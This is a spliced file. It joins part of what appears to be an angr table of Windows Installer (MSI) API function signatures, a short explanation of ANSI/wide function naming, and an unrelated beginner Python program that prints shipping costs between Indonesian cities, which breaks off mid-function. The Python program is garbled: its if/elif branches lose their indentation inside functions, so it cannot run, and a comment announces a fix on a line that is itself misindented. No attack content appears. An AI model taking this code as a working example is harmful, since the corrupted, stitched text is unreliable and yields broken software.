'MsiDatabaseImportW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szFolderPath", "szFileName"]),
#
'MsiDatabaseExportA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "szFolderPath", "szFileName"]),
#
'MsiDatabaseExportW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "szFolderPath", "szFileName"]),
#
'MsiDatabaseMergeA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseMerge", "szTableName"]),
#
'MsiDatabaseMergeW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseMerge", "szTableName"]),
#
'MsiDatabaseGenerateTransformA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iReserved1", "iReserved2"]),
#
'MsiDatabaseGenerateTransformW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iReserved1", "iReserved2"]),
#
'MsiDatabaseApplyTransformA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTransformFile", "iErrorConditions"]),
#
'MsiDatabaseApplyTransformW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTransformFile", "iErrorConditions"]),
#
'MsiCreateTransformSummaryInfoA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR"), SimTypeInt(signed=False, label="MSITRANSFORM_VALIDATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iErrorConditions", "iValidation"]),
#
'MsiCreateTransformSummaryInfoW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR"), SimTypeInt(signed=False, label="MSITRANSFORM_VALIDATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iErrorConditions", "iValidation"]),
#
'MsiDatabaseCommit': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase"]),
#
'MsiGetDatabaseState': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="MSIDBSTATE"), arg_names=["hDatabase"]),
#
'MsiCreateRecord': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["cParams"]),
#
'MsiRecordIsNull': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordDataSize': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordSetInteger': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "iValue"]),
#
'MsiRecordSetStringA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValue"]),
#
'MsiRecordSetStringW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValue"]),
#
'MsiRecordGetInteger': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordGetStringA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValueBuf", "pcchValueBuf"]),
#
'MsiRecordGetStringW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValueBuf", "pcchValueBuf"]),
#
'MsiRecordGetFieldCount': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord"]),
#
'MsiRecordSetStreamA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szFilePath"]),
#
'MsiRecordSetStreamW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szFilePath"]),
#
'MsiRecordReadStream': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szDataBuf", "pcbDataBuf"]),
#
'MsiRecordClearData': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord"]),
#
'MsiGetActiveDatabase': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall"]),
#
'MsiSetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValue"]),
#
'MsiSetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValue"]),
#
'MsiGetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValueBuf", "pcchValueBuf"]),
#
'MsiGetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValueBuf", "pcchValueBuf"]),
#
'MsiGetLanguage': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeShort(signed=False, label="UInt16"), arg_names=["hInstall"]),
#
'MsiGetMode': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIRUNMODE")], SimTypeInt(signed=True, label="Int32"), arg_names=["hInstall", "eRunMode"]),
#
'MsiSetMode': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIRUNMODE"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "eRunMode", "fState"]),
#
'MsiFormatRecordA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "hRecord", "szResultBuf", "pcchResultBuf"]),
#
'MsiFormatRecordW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "hRecord", "szResultBuf", "pcchResultBuf"]),
#
'MsiDoActionA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szAction"]),
#
'MsiDoActionW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szAction"]),
#
'MsiSequenceA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szTable", "iSequenceMode"]),
#
'MsiSequenceW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szTable", "iSequenceMode"]),
#
'MsiProcessMessage': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLMESSAGE"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hInstall", "eMessageType", "hRecord"]),
#
'MsiEvaluateConditionA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hInstall", "szCondition"]),
#
'MsiEvaluateConditionW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hInstall", "szCondition"]),
#
'MsiGetFeatureStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "piInstalled", "piAction"]),
#
'MsiGetFeatureStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "piInstalled", "piAction"]),
#
'MsiSetFeatureStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iState"]),
#
'MsiSetFeatureStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iState"]),
#
'MsiSetFeatureAttributesA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "dwAttributes"]),
#
'MsiSetFeatureAttributesW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "dwAttributes"]),
#
'MsiGetComponentStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "piInstalled", "piAction"]),
#
'MsiGetComponentStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "piInstalled", "piAction"]),
#
'MsiSetComponentStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "iState"]),
#
'MsiSetComponentStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "iState"]),
#
'MsiGetFeatureCostA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSICOSTTREE"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iCostTree", "iState", "piCost"]),
#
'MsiGetFeatureCostW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSICOSTTREE"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iCostTree", "iState", "piCost"]),
#
'MsiEnumComponentCostsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "dwIndex", "iState", "szDriveBuf", "pcchDriveBuf", "piCost", "piTempCost"]),
#
'MsiEnumComponentCostsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "dwIndex", "iState", "szDriveBuf", "pcchDriveBuf", "piCost", "piTempCost"]),
#
'MsiSetInstallLevel': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "iInstallLevel"]),
#
'MsiGetFeatureValidStatesA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "lpInstallStates"]),
#
'MsiGetFeatureValidStatesW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "lpInstallStates"]),
#
'MsiGetSourcePathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetSourcePathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetTargetPathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetTargetPathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiSetTargetPathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szFolderPath"]),
#
'MsiSetTargetPathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szFolderPath"]),
#
'MsiVerifyDiskSpace': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall"]),
#
'MsiEnableUIPreview': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "phPreview"]),
#
'MsiPreviewDialogA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szDialogName"]),
#
'MsiPreviewDialogW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szDialogName"]),
#
'MsiPreviewBillboardA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szControlName", "szBillboard"]),
#
'MsiPreviewBillboardW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szControlName", "szBillboard"]),
#
'MsiGetLastErrorRecord': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
}
lib.set_prototypes(prototypes)
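Each MSI entry point above appears in an ANSI/wide pair: the `A` variants model string arguments with `SimTypeChar(label="Byte")` (1-byte chars) while the `W` variants use `SimTypeChar(label="Char")` (2-byte UTF-16 code units). A small stand-alone helper (hypothetical, not part of this module or of angr) that captures that Win32 naming convention:

```python
def char_width(win32_name: str) -> int:
    """Character width in bytes implied by a Win32 A/W suffix.

    'W' entry points take UTF-16 strings (2 bytes per code unit);
    'A' entry points take ANSI strings (1 byte per char). Names with
    neither suffix (e.g. MsiDatabaseCommit) take no string arguments,
    so 1 is returned as a harmless default.
    """
    return 2 if win32_name.endswith("W") else 1
```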
# Source: Expedisi Sederhana.py (repo: dhimasdityaa/Program-Expedisi-Sederhana, commit 6d17dc1, MIT license)
def menu():
    print('++++++++++++++++++++++++++++++++++++++')
    print('+  Welcome to the Shipping Program   +')
    print('++++++++++++++++++++++++++++++++++++++')
    print('1. Send a Package')
    print('2. Check Shipping Cost')
def kirimPaket():
    namaP = str(input('Enter the sender name : '))
    descP = str(input('Enter the package description : '))
    noP = int(input('Enter the sender phone number : '))
    namaPe = str(input('Enter the recipient name : '))
    AlaPe = str(input('Enter the recipient address : '))
    noPe = int(input('Enter the recipient phone number : '))
    AsalP = str(input('Enter the origin city : '))
    tujuPe = str(input('Enter the destination city : '))
    berat = int(input('Enter the package weight (kg) : '))
    def result():
        total = int(ongkir) * int(berat)
        print('+================================================+')
        print('++++++++++++ SHIPPING PAYMENT RECEIPT ++++++++++++')
        print('+================================================+')
        print('+ Sender Name             :', namaP)
        print('+ Sender Phone Number     :', noP)
        print('+ Recipient Name          :', namaPe)
        print('+ Recipient Address       :', AlaPe)
        print('+ Recipient Phone Number  :', noPe)
        print('+ Package Description     :', descP)
        print('+ Shipped From            :', AsalP)
        print('+ Shipped To              :', tujuPe)
        print('+ Package Weight (kg)     :', berat)
        print('+ Shipping Cost           :', total)
        print('+================================================+')
    # Packages originating from Surabaya
if AsalP == "Surabaya":
if tujuPe == "Bekasi":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 50000
result()
elif tujuPe == "Cikarang":
ongkir = 40000
result()
elif tujuPe == "Jogja":
ongkir = 25000
result()
elif tujuPe == "Malang":
ongkir = 30000
result()
elif tujuPe == "Cilacap":
ongkir = 44000
result()
elif tujuPe == "Brebes":
ongkir = 42000
result()
    # Packages originating from Bekasi
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Cikarang
elif AsalP == "Cikarang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Bekasi":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Jogja
elif AsalP == "Jogja":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Bekasi":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Malang
elif AsalP == "Malang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Bekasi":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Cilacap
elif AsalP == "Cilacap":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Bekasi":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Brebes
    # (fixed a copy-paste bug: this branch tested "Bekasi" again and was unreachable)
    elif AsalP == "Brebes":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Bekasi":
ongkir = 33000
result()
def cekOnkir():
    AsalP = str(input('Enter the origin city :'))
    tujuPe = str(input('Enter the destination city :'))
    berat = int(input('Enter the package weight (kg) :'))
    def result():
        total = int(ongkir) * int(berat)
        print('+--------------------------------------------+')
        print('|----------- SHIPPING COST CHECK ------------|')
        print('+--------------------------------------------+')
        print('| Origin City             :', AsalP)
        print('| Destination City        :', tujuPe)
        print('| Shipping Rate           :', ongkir, 'per kg')
        print('| Package Weight          :', berat, 'kg')
        print('| Total Shipping Cost     :', total)
        print('+--------------------------------------------+')
    # Packages originating from Surabaya
if AsalP == "Surabaya":
if tujuPe == "Bekasi":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 50000
result()
elif tujuPe == "Cikarang":
ongkir = 40000
result()
elif tujuPe == "Jogja":
ongkir = 25000
result()
elif tujuPe == "Malang":
ongkir = 30000
result()
elif tujuPe == "Cilacap":
ongkir = 44000
result()
elif tujuPe == "Brebes":
ongkir = 42000
result()
    # Packages originating from Bekasi
elif AsalP == "Bekasi":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Cikarang":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Cikarang
elif AsalP == "Cikarang":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
ongkir = 20000
result()
elif tujuPe == "Bekasi":
ongkir = 10000
result()
elif tujuPe == "Jogja":
ongkir = 40000
result()
elif tujuPe == "Malang":
ongkir = 35000
result()
elif tujuPe == "Cilacap":
ongkir = 28000
result()
elif tujuPe == "Brebes":
ongkir = 33000
result()
    # Packages originating from Jogja
elif AsalP == "Jogja":
if tujuPe == "Surabaya":
ongkir = 45000
result()
elif tujuPe == "Jakarta":
